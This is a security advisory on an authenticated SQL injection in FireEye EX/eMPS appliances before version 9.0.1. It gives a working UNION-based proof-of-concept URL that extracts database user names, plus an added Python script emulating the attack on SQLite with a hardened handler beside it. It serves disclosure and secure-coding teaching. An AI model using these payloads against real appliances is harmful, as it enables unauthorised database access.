-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2020-031
Product: FireEye EX 3500, eMPS
Manufacturer: FireEye
Affected Version(s): Versions prior to eMPS 9.0.1
Tested Version(s): eMPS 8.4.3.908134
Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') (CWE-89)
Risk Level: Low
Solution Status: Fixed
Manufacturer Notification: 2020-07-28
Solution Date: 2020-09-29
Public Disclosure: 2020-10-26
CVE Reference: CVE-2020-25034
Author of Advisory: Dr. Benjamin Hess, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

FireEye EX is an e-mail security appliance that detects and blocks unwanted e-mails. The appliance is primarily controlled via a web GUI.

The manufacturer describes the product as follows (see [1]):

"FireEye Email Security detects and blocks every kind of unwanted email, especially targeted advanced attacks. Time and again, this solution has proven itself capable of detecting corporate email threats in traffic accepted as safe by other products."

Due to missing sanitization of user-controlled input, the web application is vulnerable to SQL injection, which allows an authenticated user to extract data from the underlying database. Exploitation requires authenticated access to the application; low privileges are sufficient. Considering this and the fact that such appliances are usually placed in separate networks with restricted access, the risk level is rated as "low".

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The vulnerability can be triggered by logging onto the web GUI as an authenticated user and searching for processed e-mails. The vulnerability was successfully triggered with active sessions for the following roles: "monitor", "analyst", "operator", "admin". The role "auditor" does not have access to the e-mail search.
Multiple SQL injection vectors were identified for different search parameters such as "sort", "sort_by", "search[url]", and "search[attachment]", most of them involving time-based blind injection. The most powerful vector injects a UNION query via the "sort" parameter.

The underlying database management system is Postgres, and the queries are executed as the database user "webui", which is not a database administrator. Furthermore, stacked queries could not be achieved within the testing time, so exploitation is limited to read access to the database with the privileges of the "webui" role.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Sending the following GET request with the cookies of an active session, for example in the role "monitor", demonstrates successful exploitation:

https://targethost.com/ex/message_tracking/messages?sort=ASC')+UNION+ALL+SELECT+NULL,usename,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+FROM+pg_user--+foo&sort_by=1&offset=0&num=25&search%5Burl%5D=a&search%5Battachment%5D=a&job_id=1

The injected SELECT is padded with NULL values so that its column count matches that of the original query, and the "--" comment discards the remainder of the original statement on that line. The response contains JSON objects and has additional elements whose field "message_id" is set to the names of the database users, one name per element: the "usename" column of "pg_user" lands in the second column of the result, which the application serializes as "message_id".

As mentioned in the previous section, other parameters are vulnerable as well.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Upgrade to version 9.0.1 or later.
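The following Python script is an added example and is not code from this advisory or from FireEye. It emulates the UNION technique of the PoC against an in-memory SQLite database and puts a parameterised handler beside the vulnerable one. The schema, the data, the hypothetical handler's query shape (the user-controlled filter sits inside a parenthesised LIKE at the end of the WHERE clause) and the use of a "pg_user" table as a stand-in for the Postgres catalog are all assumptions. The payload's ') prefix suggests the appliance's real query used the sort value inside a quoted, parenthesised expression; since a UNION can only follow a complete SELECT and cannot be appended behind an ORDER BY clause, the emulation routes the same prefix through a filter parameter instead.

```python
"""Emulation of the UNION-based SQL injection technique from SYSS-2020-031
against an in-memory SQLite database.  Schema, data and the handler's query
shape are constructed for this example; none of it is FireEye's code."""
import sqlite3

# Constructed stand-in for the appliance database. "pg_user" mimics the
# Postgres catalog view the advisory's PoC reads user names from.
SCHEMA = """
CREATE TABLE messages (
    id INTEGER PRIMARY KEY, job_id INTEGER, message_id TEXT,
    subject TEXT, sender TEXT, url TEXT, attachment TEXT);
CREATE TABLE pg_user (usename TEXT, usesuper INTEGER);
INSERT INTO messages VALUES
    (1, 1, '<m1@example.net>', 'Invoice', 'a@example.net', 'http://a.example/x', 'a.pdf'),
    (2, 1, '<m2@example.net>', 'Report',  'b@example.net', 'http://b.example/y', 'b.zip'),
    (3, 2, '<m3@example.net>', 'Other',   'c@example.net', 'http://a.example/z', 'c.doc');
INSERT INTO pg_user VALUES ('postgres', 1), ('webui', 0), ('replication', 0);
"""
COLUMNS = ("id", "message_id", "subject", "sender")  # keys of the JSON objects


def new_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def search_vulnerable(conn, job_id, url, attachment, sort="ASC", num=25, offset=0):
    """Hypothetical handler that pastes every parameter into the SQL text.
    The url filter is the last predicate, inside a parenthesised LIKE, so a
    value ending in ') can append a UNION; the trailing '-- foo' comments out
    the remainder of that line only, and the ORDER BY/LIMIT lines still parse."""
    sql = f"""
SELECT id, message_id, subject, sender
FROM messages
WHERE job_id = {job_id}
  AND (attachment LIKE '%{attachment}%')
  AND (url LIKE '%{url}%')
ORDER BY id {sort}
LIMIT {num} OFFSET {offset}
"""
    return [dict(zip(COLUMNS, row)) for row in conn.execute(sql)]


def probe_column_count(conn, max_cols=32):
    """Step 1 of a UNION attack: find how many columns the injected SELECT
    must return by padding with NULL until the database stops raising a
    column-count error (19 in the advisory's PoC, 4 for this schema)."""
    for n in range(1, max_cols + 1):
        payload = "a') UNION ALL SELECT " + ", ".join(["NULL"] * n) + "-- foo"
        try:
            search_vulnerable(conn, 1, payload, "")
            return n
        except sqlite3.OperationalError:
            continue
    return None


def dump_db_users(conn):
    """Step 2: put pg_user.usename into the column the handler serialises as
    "message_id" (the second one) and read the names out of the rows that
    carry no real id, which is how the advisory's PoC exfiltrates them."""
    payload = "a') UNION ALL SELECT NULL, usename, NULL, NULL FROM pg_user-- foo"
    rows = search_vulnerable(conn, 1, payload, "")
    return sorted(r["message_id"] for r in rows if r["id"] is None)


SORTABLE = {"id", "message_id", "subject", "sender"}
DIRECTIONS = {"ASC", "DESC"}


def like_pattern(text):
    """Escape LIKE metacharacters so a user-supplied % or _ cannot widen the filter."""
    text = text.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    return f"%{text}%"


def search_hardened(conn, job_id, url, attachment, sort_by="id", sort="ASC",
                    num=25, offset=0):
    """Fixed handler: values are bound parameters; the sort column and
    direction, which cannot be bound, are checked against allow-lists."""
    if sort_by not in SORTABLE or sort.upper() not in DIRECTIONS:
        raise ValueError("invalid sort parameter")
    sql = f"""
SELECT id, message_id, subject, sender
FROM messages
WHERE job_id = ?
  AND attachment LIKE ? ESCAPE '\\'
  AND url LIKE ? ESCAPE '\\'
ORDER BY {sort_by} {sort.upper()}
LIMIT ? OFFSET ?
"""
    params = (int(job_id), like_pattern(attachment), like_pattern(url),
              int(num), int(offset))
    return [dict(zip(COLUMNS, row)) for row in conn.execute(sql, params)]


if __name__ == "__main__":
    db = new_db()
    print("columns needed:", probe_column_count(db))
    print("database users via vulnerable handler:", dump_db_users(db))
    payload = "a') UNION ALL SELECT NULL, usename, NULL, NULL FROM pg_user-- foo"
    print("same payload via hardened handler:", search_hardened(db, 1, payload, ""))
```

The allow-list for "sort_by" and "sort" is the part of the fix that parameterisation alone cannot provide: identifiers and keywords in ORDER BY cannot be bound, and although an ORDER BY position cannot host a UNION, it still accepts arbitrary expressions and is therefore a natural place for the boolean- or time-based blind injection the advisory reports for the other parameters.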
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2020-07-24: Vulnerability discovered
2020-07-28: Vulnerability reported to manufacturer
2020-09-29: Patch released by manufacturer
2020-10-26: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product Website for FireEye Email Security
    https://www.fireeye.com/products/email-security.html
[2] SySS Security Advisory SYSS-2020-031
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-031.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Dr. Benjamin Hess of SySS GmbH.

E-Mail: benjamin.hess@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Benjamin_Hess.asc
Key ID: 0x1331325C
Key Fingerprint: D73C 3C3D 746C 66C3 D0AE BED8 7FD5 638E 1331 325C

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEE1zw8PXRsZsPQrr7Yf9VjjhMxMlwFAl+SfYgACgkQf9VjjhMx
Mlx2eRAApL7g9/vPXaER8weQkI+blCtkrMRH74xR9ir+OcNzB8osJoA4iqUKVKta
GhoO3+Alz/1THGPDkOhfMd6aOgn07IdA6ugUg+1ZTRxoV2AaqhjjJz0vow76tr8C
KCqaQBGMFFF5LgcwjLdvwqk4/qM+A5b9hekztuQk7UPijGG07ZpejSim/OPqTM8i
p/9Q6VM0WAPTN2+1reClLItj4wxuA31ge98JJoEix8EzFq6YDu6ibttn9fUcMXHY
oKXK6a2oiW1g8lotXEw8RrGp0Wjm83MuozYYPmKgEOCAYU+c4KsgrNg2oGSp/vsK
USoMjeVSdmOjxumRvoW1Yf5y4bOCfOiB8knnmr8sX1czTxKW2iF0MHX2kQIe+tGQ
DCkQ3dWmZFeBzFXHwSjEOTBMDM8YDtL+LOvQQ6R9rAqEn76ebzhFO7TD3k/W3Zel
1xTuCTeE/SsjjkDWyBkxqaEMipk2SRVriMdjhvfu9NO5Dp5JFo40F1HbdLn3IrQJ
HnY+bkB9SXU8LahpX9YihHoKbCnijq728vPSSg09NSKTJ87L5UiJyp0y5ICX9mjW
uXpDfY3ydlsIXUzqZXkflqWTyOW+17ruQnVYNhGcyh41jqDFkPlN2lAo9MJr0rbQ
Fxl0doPLFlXIe8NE1SPlV/9bkDZzR9iv2Pu6JznZI7JrpLgYrdo=
=XLR4
-----END PGP SIGNATURE-----